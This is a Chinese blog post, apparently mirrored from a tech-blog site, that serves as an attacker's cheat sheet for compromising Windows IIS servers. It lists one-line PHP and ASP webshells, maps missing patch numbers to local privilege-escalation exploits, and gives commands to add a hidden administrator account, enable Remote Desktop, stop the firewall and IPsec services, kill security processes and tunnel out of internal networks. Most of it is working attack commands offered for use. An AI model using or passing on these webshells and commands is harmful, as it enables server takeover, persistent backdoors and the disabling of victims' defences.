zoukankan      html  css  js  c++  java
  • 判别木马

    eval (base64_decode($_POST["php"]));

    <?php @eval($_POST[sb])?>

    <%eval request("sb")%>

    Eval(Request(chr(35)))

    <%ExecuteGlobal request("sb")%>

    <?php assert($_POST[sb]);?>
    //使用lanker一句话客户端的专家模式执行相关的php语句
    程序代码
    <?$_POST['sa']($_POST['sb']);?>
    程序代码
    <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
    程序代码
    <?php
    @preg_replace("/[email]/e",$_POST['h'],"error");
    ?>

    systeminfo命令查看下是否有未补丁漏洞,或者通过查询c:windows 里留下的补丁号.log来看看服务器大概打了哪些补丁

    KB2360937 MS10-084
    KB2478960 MS11-014
    KB2507938 MS11-056
    KB2566454 MS11-062
    KB2646524 MS12-003
    KB2645640 MS12-009
    KB2641653 MS12-018
    KB944653 MS07-067
    KB952004 MS09-012   pr

    KB956572 MS09-012 巴西烤肉
    KB971657 MS09-041
    KB2620712 MS11-097
    KB2393802 MS11-011  ms11011.exe
    kb942831 MS08-005
    KB2503665 MS11-046  ms11046.exe

    KB2592799 MS11-080  ms11080.exe

    没打补丁的话,会被上传恶心的exploit.

    当asp不支持WScript时候.而支持aspx的脚本时候就会用aspx,因为Aspx webshell是调用.net的组件来运行cmd命令的.

    Aspxspy还有一个反弹的 端口映射

    /c C:RECYCLER ms11080.exe 

    Pr的使用方法就是 文件所在的路径 + “cmd命令” ps:要注意有””双引号!!.

    C:RECYCLER pr.exe "net user xiaoguai h4x0er.com /add & net localgroup administrators xiaoguai /add"

    若是执行pr,为什么不回显呢?
    因为上传的文件的路径 文件夹里面有 空格c:Documents and Settings 所以一般会被放到C:RECYCLER

    接着就被查看3389的端口.点击读取注册表,读取HK_L_M SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber
    这个键里面的值.

    附录1.

    IIS6.0下将webshell提升为system用户权限的方法:进入应用程序池-属性-标识:将标识里面的预定义账号设为:本地系统 (代表webshell具有system用户权限)或者选用那个”IWAM_主机名”用户,再用clone5.exe程序克隆“IWAM_主机名”用户

    你可以把“@echo %i Not Installed!” 换成 “%i.exe Parameters“,就可以自动提权了(没换是检测那个漏洞)……

    systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

    systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644) do @type a.txt|@find /i  "%i" ||@echo %i Not Installed!)&del /f /q /a a.txt

    dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

    3.3389连接不上的解决方法
    如果直接连接连接不上的话,有可能是以下几种情况以及解决方法

    1.远程桌面服务没开启
    可以把
    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    保存成bat文件在cmd下找个可写目录然后以system权限运行.
    2.IP策略阻拦
    sc stop policyagent
    3.windows自带防火墙阻拦
    net stop sharedaccess
    4.其他防火墙阻拦
    tasklist /svc此命令可以获取每个进程中主持的服务
    看到哪个不是系统自带的服务或者正在运行的进程
    用ntsd -c q -pn xxx.exe 和 net stop 还有sc stop 这几个命令以system权限xx掉它.
    5.内网
    可以通过lcx等转发工具.

  • 相关阅读:
    【Elasticsearch 技术分享】—— ES 常用名词及结构
    【Elasticsearch 技术分享】—— Elasticsearch ?倒排索引?这都是什么?
    除了读写锁,JUC 下面还有个 StampedLock!还不过来了解一下么?
    小伙伴想写个 IDEA 插件么?这些 API 了解一下!
    部署Microsoft.ReportViewe
    关于TFS强制undo他人check out
    几段查看数据库表占用硬盘空间的tsql
    How to perform validation on sumbit only
    TFS 2012 Disable Multiple Check-out
    在Chrome Console中加载jQuery
  • 原文地址:https://www.cnblogs.com/alex-13/p/3296713.html
Copyright © 2011-2022 走看看